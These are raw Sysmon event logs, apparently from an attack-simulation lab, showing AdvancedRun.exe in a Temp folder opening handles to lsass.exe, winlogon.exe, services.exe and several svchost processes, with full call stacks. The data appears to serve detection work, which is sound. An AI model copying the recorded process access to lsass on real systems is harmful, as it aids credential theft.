20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004080454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.457{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.456{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.455{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004080439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.447{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationwtsapi32.dllMD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5EtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.454{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 